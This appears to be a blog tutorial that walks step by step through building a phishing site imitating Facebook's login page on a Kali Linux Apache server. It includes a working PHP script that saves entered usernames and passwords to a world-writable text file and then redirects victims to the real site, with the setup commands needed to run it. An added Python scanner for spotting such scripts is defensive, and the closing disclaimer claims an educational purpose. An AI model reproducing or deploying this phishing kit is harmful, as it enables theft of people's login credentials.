How to Make a Phishing Website That Steals Credentials


Making a phishing website that steals credentials manually can be done very easily. Let’s jump into it!

Requirements:

  1. We need a Kali Linux machine.
  2. We will run the Apache server.
  3. We will need three files: an HTML file, a PHP file, and a text file.

We will do it step by step!

STEP 1:

  1. The first step is to start your Kali Linux machine.
  2. We need an HTML file that contains HTML and CSS code.
  3. Below is the Code for the Facebook Login Page, so download it:

NOTE: Make sure the file name is “index.html”.

STEP 2:

After downloading it, open your Terminal and move to the /var/www/html directory, which is the default directory for the Apache Server’s Configuration files!

cd /var/www/html

There will be an index.html file:


Open the index.html file, remove all the content, and paste the downloaded code! I am using the nano Editor, but you can use whatever you like!

nano index.html

and then Save the File!

STEP 3:

One file is now complete. We have to create the remaining two files, so create a text file in the same directory:

touch usernames.txt

After creating the “usernames.txt” file, we need to give this file write permissions:

chmod 777 usernames.txt

Now we will create a PHP file, which will capture the login credentials and save them to the text file. We have to be in the same directory, /var/www/html:

nano capture.php

Copy the below PHP script, and save it in the “capture.php” file:

<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $username = $_POST["username"];
    $password = $_POST["password"];
    
    // Store credentials in a file
    $file = fopen("usernames.txt", "a");
    fwrite($file, "Username: " . $username . " | Password: " . $password . "\n");
    fclose($file);
    
    // Redirect to real Facebook
    header("Location: https://www.facebook.com");
    exit();
}
?>

Once the file is saved, we have to give it some permissions to execute correctly and avoid errors:

chmod 777 capture.php

So, now you will have three files in the /var/www/html directory: a “usernames.txt” file, a “capture.php” file, and an “index.html” file.


NOTE: Make sure that file names are the same as I mentioned above to avoid errors.

STEP 4:

Let’s run the Apache server:

systemctl start apache2

If no error is displayed, it means that the Apache server is running!

-> Run the “ifconfig” command -> note the IP address -> go to Firefox and paste it!

Let’s Test if it is working or not!


Once you press Log in, it will redirect you to the official Facebook page, and the credentials that were entered will be stored in the “usernames.txt” file! Let’s see it!

Congratulations! It’s working well!
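For defenders, the three behaviours the capture script combines (reading a posted password field, writing to a local file, and redirecting to an external site), plus the world-writable log file, give hosting and incident-response teams a triage signature for web roots. The Python scanner below is an added example, not part of the original article; its function names, patterns and sample files are constructed assumptions.

```python
import os
import re
import stat
import tempfile

# Behaviours that, taken together, characterise a credential-capture script.
SIGNALS = {
    "reads_password": re.compile(r"\$_(POST|REQUEST)\s*\[\s*['\"][^'\"]*pass[^'\"]*['\"]\s*\]", re.I),
    "writes_file": re.compile(r"\b(fopen\s*\([^)]*['\"][aw]\+?b?['\"]|file_put_contents\s*\(|fwrite\s*\()", re.I),
    "offsite_redirect": re.compile(r"header\s*\(\s*['\"]Location:\s*https?://", re.I),
}

def classify_php(source):
    """Return the sorted names of the signals present in PHP source text."""
    return sorted(name for name, rx in SIGNALS.items() if rx.search(source))

def scan_webroot(root):
    """Walk a web root; report likely capture scripts and world-writable files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue  # ignore symlinks, sockets and devices
            rel = os.path.relpath(path, root)
            if st.st_mode & stat.S_IWOTH:
                findings.append((rel, "world-writable"))
            if fname.lower().endswith((".php", ".phtml")):
                with open(path, "r", errors="replace") as fh:
                    hits = classify_php(fh.read(1_000_000))
                if len(hits) == len(SIGNALS):  # flag only when all three co-occur
                    findings.append((rel, "credential-capture pattern"))
    return sorted(findings)

def demo():
    """Scan a constructed web root built in a temporary directory."""
    with tempfile.TemporaryDirectory() as root:
        # Constructed samples: a benign handler, and one showing all three behaviours.
        samples = {
            "login.php": '<?php $p = $_POST["password"]; password_verify($p, $hash); header("Location: /home"); ?>',
            "capture.php": '<?php $p = $_POST["password"]; $f = fopen("out.txt", "a"); fwrite($f, $p); header("Location: https://example.com"); ?>',
            "out.txt": "",
        }
        for name, body in samples.items():
            path = os.path.join(root, name)
            with open(path, "w") as fh:
                fh.write(body)
            os.chmod(path, 0o666 if name == "out.txt" else 0o644)  # out.txt mimics the over-permissive log
        return scan_webroot(root)
```

Requiring all three signals together keeps ordinary login handlers, which read a password but neither log it nor redirect off-site, out of the results.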

Disclaimer:

This article is for educational purposes only. The information provided in this blog is intended to help cybersecurity enthusiasts and ethical hackers understand how phishing attacks work so they can better protect themselves and others.

⚠️ Unauthorized use of phishing techniques is illegal and unethical. The author and this website do not encourage or support any illegal activities.

By following this tutorial, you agree that you will use this knowledge responsibly and only for ethical hacking, penetration testing (with proper authorization), or educational purposes. If you misuse this information, you are solely responsible for your actions.

Stay ethical, stay legal.